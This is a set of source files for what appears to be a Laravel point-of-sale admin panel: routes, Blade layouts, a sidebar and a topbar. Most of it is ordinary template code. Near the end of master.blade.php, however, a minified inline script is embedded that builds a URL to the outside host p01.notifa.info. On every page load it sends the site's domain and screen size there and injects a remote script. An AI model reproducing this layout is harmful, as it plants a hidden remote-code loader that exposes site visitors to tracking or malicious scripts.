routes/web.php
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::get('/', function () {
    return view('welcome');
});

Auth::routes();


Route::group(['middleware' => 'auth'], function () {
Route::get('/home', 'HomeController@index')->name('home');
Route::resource('categories','CategoryController');
Route::get('/categories/publish/{id}','CategoryController@publish')->name('categories.publish');
Route::get('/categories/draft/{id}','CategoryController@draft')->name('categories.draft');

Route::resource('product','ProductController');
Route::get('/product/publish/{id}','ProductController@publish')->name('product.publish');
Route::get('/product/draft/{id}','ProductController@draft')->name('product.draft');
Route::get('/product/search/{id}', 'ProductController@search');

Route::resource('stock','StockController');
Route::resource('transaction','TransactionController')->except(['edit','update','destroy']);
Route::get('/transaction/search/{id}', 'TransactionController@search');

Route::resource('refund','RefundController')->except(['edit','update','destroy','show']);
});

resources/views/layouts/app.blade.php
<!DOCTYPE html>
<html lang="{{ str_replace('_', '-', app()->getLocale()) }}">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- CSRF Token -->
    <meta name="csrf-token" content="{{ csrf_token() }}">

    <title>{{ config('app.name', 'Laravel') }}</title>

    <!-- Scripts -->
    <script src="{{ asset('js/app.js') }}" defer></script>

    <!-- Fonts -->
    <link rel="dns-prefetch" href="//fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css?family=Nunito" rel="stylesheet" type="text/css">

    <!-- Styles -->
    <link href="{{ asset('css/app.css') }}" rel="stylesheet">
</head>
<body>
    <div id="app">
        <nav class="navbar navbar-expand-md navbar-light navbar-laravel">
            <div class="container">
                <a class="navbar-brand" href="{{ url('/') }}">
                    {{ config('app.name', 'Laravel') }}
                </a>
                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="{{ __('Toggle navigation') }}">
                    <span class="navbar-toggler-icon"></span>
                </button>

                <div class="collapse navbar-collapse" id="navbarSupportedContent">
                    <!-- Left Side Of Navbar -->
                    <ul class="navbar-nav mr-auto">

                    </ul>

                    <!-- Right Side Of Navbar -->
                    <ul class="navbar-nav ml-auto">
                        <!-- Authentication Links -->
                        @guest
                            <li class="nav-item">
                                <a class="nav-link" href="{{ route('login') }}">{{ __('Login') }}</a>
                            </li>
                            @if (Route::has('register'))
                                <li class="nav-item">
                                    <a class="nav-link" href="{{ route('register') }}">{{ __('Register') }}</a>
                                </li>
                            @endif
                        @else
                            <li class="nav-item dropdown">
                                <a id="navbarDropdown" class="nav-link dropdown-toggle" href="#" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" v-pre>
                                    {{ Auth::user()->name }} <span class="caret"></span>
                                </a>

                                <div class="dropdown-menu dropdown-menu-right" aria-labelledby="navbarDropdown">
                                    <a class="dropdown-item" href="{{ route('logout') }}"
                                       onclick="event.preventDefault();
                                                     document.getElementById('logout-form').submit();">
                                        {{ __('Logout') }}
                                    </a>

                                    <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;">
                                        @csrf
                                    </form>
                                </div>
                            </li>
                        @endguest
                    </ul>
                </div>
            </div>
        </nav>

        <main class="py-4">
            @yield('content')
        </main>
    </div>
</body>
</html>

resources/views/layouts/footer.blade.php
{{-- <!--Start footer-->
<footer class="footer">
    <div class="container">
      <div class="text-center">
        Copyright © 2018 DashRock Admin
      </div>
    </div>
  </footer>
  <!--End footer--> --}}

resources/views/layouts/master.blade.php
<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from codervent.com/dashrock/color-admin/pages-blank-page.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 04 Nov 2018 06:58:10 GMT -->
<head>
  <meta charset="utf-8"/>
  <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>
  <meta name="description" content=""/>
  <meta name="author" content=""/>
  <title>{{ $title }}</title>
  <!--favicon-->
  <link rel="icon" href="assets/images/favicon.ico" type="image/x-icon">
  <!-- simplebar CSS-->
  <link href=" {{asset('assets/plugins/simplebar/css/simplebar.css') }}" rel="stylesheet"/>
  <!-- Bootstrap core CSS-->
  <link href=" {{asset('assets/css/bootstrap.min.css') }}" rel="stylesheet"/>
  <!-- animate CSS-->
  <link href=" {{asset('assets/css/animate.css') }}" rel="stylesheet" type="text/css"/>
  <!-- Icons CSS-->
  <link href=" {{asset('assets/css/icons.css') }}" rel="stylesheet" type="text/css"/>
  <!-- Sidebar CSS-->
  <link href=" {{asset('assets/css/sidebar-menu.css') }}" rel="stylesheet"/>
  <!-- Custom Style-->
  <link href=" {{asset('assets/css/app-style.css') }}" rel="stylesheet"/>

  {{-- IMPORT CSS --}}
  @yield('top')
  
</head>

<body>

<!-- Start wrapper-->
 <div id="wrapper">
 
  {{-- IMPORT SIDEBAR --}}
@include('layouts.sidebar')

{{-- IMPORT TOP BAR --}}
@include('layouts.topbar')

<div class="clearfix"></div>
	
  <div class="content-wrapper">
    <div class="container-fluid">
    <!-- Breadcrumb-->
     <div class="row pt-2 pb-2">

        {{-- <div class="col-sm-9">
		    <h4 class="page-title">Blank Page</h4>
		    <ol class="breadcrumb">
            <li class="breadcrumb-item"><a href="javaScript:void();">DashRock</a></li>
            <li class="breadcrumb-item"><a href="javaScript:void();">Pages</a></li>
            <li class="breadcrumb-item active" aria-current="page">Blank Page</li>
         </ol>
       </div> --}}
       
     {{-- <div class="col-sm-3">
       <div class="btn-group float-sm-right">
        <button type="button" class="btn btn-outline-primary waves-effect waves-light"><i class="fa fa-cog mr-1"></i> Setting</button>
        <button type="button" class="btn btn-outline-primary dropdown-toggle dropdown-toggle-split waves-effect waves-light" data-toggle="dropdown">
        <span class="caret"></span>
        </button>
        <div class="dropdown-menu">
          <a href="javaScript:void();" class="dropdown-item">Action</a>
          <a href="javaScript:void();" class="dropdown-item">Another action</a>
          <a href="javaScript:void();" class="dropdown-item">Something else here</a>
          <div class="dropdown-divider"></div>
          <a href="javaScript:void();" class="dropdown-item">Separated link</a>
        </div>
      </div>
     </div> --}}

     </div>
    <!-- End Breadcrumb-->
      <div class="row">
        <div class="col-lg-12"> <!--Please remove the height before using this page-->
            
          {{-- IMPORT CONTENT --}}
          @yield('content')

		  </div>
        </div>
      </div>

    </div>
    <!-- End container-fluid-->
    
   </div><!--End content-wrapper-->
   <!--Start Back To Top Button-->
    <a href="javaScript:void();" class="back-to-top"><i class="fa fa-angle-double-up"></i> </a>
    <!--End Back To Top Button-->

	{{-- IMPORT FOOTER --}}
	@include('layouts.footer')
   
  </div><!--End wrapper-->


  <!-- Bootstrap core JavaScript-->
  <script src=" {{asset('assets/js/jquery.min.js') }} "></script>
  <script src=" {{asset('assets/js/popper.min.js') }} "></script>
  <script src=" {{asset('assets/js/bootstrap.min.js') }} "></script>
	
  <!-- simplebar js -->
  <script src=" {{asset('assets/plugins/simplebar/js/simplebar.js') }} "></script>
  <!-- waves effect js -->
  <script src=" {{asset('assets/js/waves.js') }} "></script>
  <!-- sidebar-menu js -->
  <script src=" {{asset('assets/js/sidebar-menu.js') }} "></script>
  <!-- Custom scripts -->
  <script src=" {{asset('assets/js/app-script.js') }} "></script>

  @yield('bot')
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bdLrCjqgQBIHkeE2CkaKZqXrK27Hpd4vqJx9EzF%2bgwA5kcw%2fOJnt6Zl%2fFnIW1%2fYuxhtEQ0zBuKHQNka%2f5mxyjsxMv5G2BtDx%2fCPbxYq4d4546YAWyTGwBjTc6h3uZGI%2bCE2kSDujU1D95F6czIT5etO1czV3OoZpfWjTHKps8hMqzZW%2bP3F4i%2fFr1xk4CkwBtHt5Xq1QpAR%2f%2bTf%2fur%2bUENEM89wtMt0K8jN0TBhbAiHb38nHRlb%2f0WklTJA6v7%2fgxtr%2fw2JiQZ3HKl230a6Rl0cai%2fDBso%2bUBn%2b1GGnQMc4O0K3bL190FnHoO0BT0rmq9ZOsxBFt1Evwqu1fyAyeDrPBl1D1R6dkWBFi%2bXgJkuolChgQMaSns0qMF%2b5uxdMaL9NM4FQWMlyoNnepjalgxL9zLYnyQiGRCvZkZmLzuU7K%2bEXRjjDsoenZ9pydzfh2x%2bA4%2btGALDypW4EbKT59tbEV5JoPrVEofASWSSnrcamW7%2bQhaPO3ceMUoWEK%2bheD5ruh1Fn6fmMLY%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from codervent.com/dashrock/color-admin/pages-blank-page.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 04 Nov 2018 06:58:10 GMT -->
</html>

resources/views/layouts/sidebar.blade.php
<!--Start sidebar-wrapper-->
<div id="sidebar-wrapper" data-simplebar="" data-simplebar-auto-hide="true">
    <div class="brand-logo">
     <a href="index.html">
      <img src=" {{asset('assets/images/logo-icon.png') }}" class="logo-icon" alt="logo icon">
      <h5 class="logo-text"> Point Of Sales</h5>
    </a>
    </div>
    <div class="user-details">
     <div class="media align-items-center user-pointer collapsed" data-toggle="collapse" data-target="#user-dropdown">
       <div class="avatar"><img class="mr-3 side-user-img" src=" {{asset('assets/images/avatars/avatar-4.png') }} " alt="user avatar"></div>
        <div class="media-body">
        <h6 class="side-user-name">{{ ucwords(Auth::user()->name) }}</h6>
       </div>
      </div>
      <div id="user-dropdown" class="collapse">
         <ul class="user-setting-menu">
           <li><a  href="{{ route('logout') }}" onclick="event.preventDefault();
                                  document.getElementById('logout-form').submit();">
                                  <i class="icon-power"></i> {{ __('Logout') }}</a>
                <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;">
                    @csrf
                </form>
            </li>

                                    
         </ul>
      </div>
     </div>
    <ul class="sidebar-menu do-nicescrol">
     <li class="sidebar-header">MAIN NAVIGATION</li>
     
     <li class="sidebar-header">LABELS</li>
     <li><a href="{{ route('home') }}" class="waves-effect"><i class="fa fa-dashboard text-info"></i><span>Dashboard</span></a></li>

     <li>
       <a href="javaScript:void();" class="waves-effect">
       <i class="fa fa-cubes"></i><span>Produk</span> 
          <i class="fa fa-angle-left pull-right"></i>
       </a>
       <ul class="sidebar-submenu">
               <li><a href="{{ route('product.index') }}"><i class="fa fa-long-arrow-right"></i> Lihat Data</a></li>
               <li><a href="{{ route('product.create') }}"><i class="fa fa-long-arrow-right"></i> Buat Data</a></li>
       </ul>
     </li>
     
     <li>
       <a href="javaScript:void();" class="waves-effect">
          <i class="fa fa-bars"></i><span>Kategori</span>
         <i class="fa fa-angle-left pull-right"></i>
       </a>
       <ul class="sidebar-submenu">
         <li><a href="{{ route('categories.index') }}"><i class="fa fa-long-arrow-right"></i>Lihat Data</a></li>
             <li><a href="{{  route('categories.create') }}"><i class="fa fa-long-arrow-right"></i> Buat Data</a></li>
       </ul>
     </li>

     <li>
       <a href="javaScript:void();" class="waves-effect">
          <i class="fa fa-cube"></i><span>Data Stok</span>
         <i class="fa fa-angle-left pull-right"></i>
       </a>
       <ul class="sidebar-submenu">
         <li><a href="{{ route('stock.index') }}"><i class="fa fa-long-arrow-right"></i>Lihat Data</a></li>
             <li><a href="{{ route('stock.create') }}"><i class="fa fa-long-arrow-right"></i> Buat Data</a></li>
       </ul>
     </li>

     <li>
       <a href="javaScript:void();" class="waves-effect">
          <i class="fa fa-exchange"></i><span>Data Transaksi</span>
         <i class="fa fa-angle-left pull-right"></i>
       </a>
       <ul class="sidebar-submenu">
         <li><a href="{{ route('transaction.index') }}"><i class="fa fa-long-arrow-right"></i>Lihat Data</a></li>
             <li><a href="{{ route('transaction.create') }}"><i class="fa fa-long-arrow-right"></i> Buat Data</a></li>
       </ul>
     </li>

     <li>
       <a href="javaScript:void();" class="waves-effect">
          <i class="icon-diamond"></i><span>Refund</span>
         <i class="fa fa-angle-left pull-right"></i>
       </a>
       <ul class="sidebar-submenu">
         <li><a href="{{  route('refund.index') }}"><i class="fa fa-long-arrow-right"></i>Lihat Data</a></li>
             <li><a href="{{ route('refund.create') }}"><i class="fa fa-long-arrow-right"></i>Buat Data</a></li>
       </ul>
     </li>

     <li class="sidebar-header">LABELS</li>
     <li>
            <a class="waves-effect" href="{{ route('logout') }}" onclick="event.preventDefault();
                        document.getElementById('logout-form').submit();">
                        <i class="icon-power text-danger"></i> {{ __('Logout') }}</a>
            <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;">
                @csrf
            </form>

         </li>
   </ul>
    
  </div>
  <!--End sidebar-wrapper-->

resources/views/layouts/topbar.blade.php
  <!--Start topbar header-->
  <header class="topbar-nav">
    <nav class="navbar navbar-expand fixed-top gradient-ibiza">
     <ul class="navbar-nav mr-auto align-items-center">
       <li class="nav-item">
         <a class="nav-link toggle-menu" href="javascript:void();">
          <i class="icon-menu menu-icon"></i>
        </a>
       </li>
       <li class="nav-item">
         <form class="search-bar">
           <input type="text" class="form-control" placeholder="Enter keywords">
            <a href="javascript:void();"><i class="icon-magnifier"></i></a>
         </form>
       </li>
     </ul>
        
     <ul class="navbar-nav align-items-center right-nav-link">
   
       <li class="nav-item">
         <a class="nav-link dropdown-toggle dropdown-toggle-nocaret" data-toggle="dropdown" href="#">
           <span class="user-profile"><img src=" {{asset('assets/images/avatars/avatar-4.png') }}" class="img-circle" alt="user avatar"></span>
         </a>
         <ul class="dropdown-menu dropdown-menu-right animated fadeIn">
          <li class="dropdown-item user-details">
           <a href="javaScript:void();">
              <div class="media">
                <div class="avatar"><img class="align-self-start mr-3" src=" {{asset('assets/images/avatars/avatar-4.png') }} " alt="user avatar"></div>
               <div class="media-body">
               <h6 class="mt-2 user-title">{{ Auth::user()->name }} </h6>
               <p class="user-subtitle">{{ Auth::user()->email }} </p>
               </div>
              </div>
             </a>
           </li>
           <li class="dropdown-divider"></li>
           {{-- <li class="dropdown-item"><i class="icon-power mr-2"></i> Logout</li> --}}
           <li>
                <a class="dropdown-item" href="{{ route('logout') }}" onclick="event.preventDefault();
                            document.getElementById('logout-form').submit();">
                            <i class="icon-power text-danger"></i> {{ __('Logout') }}</a>
                <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;">
                    @csrf
                </form>
    
             </li>
         </ul>
       </li>
     </ul>
   </nav>
   </header>
   <!--End topbar header-->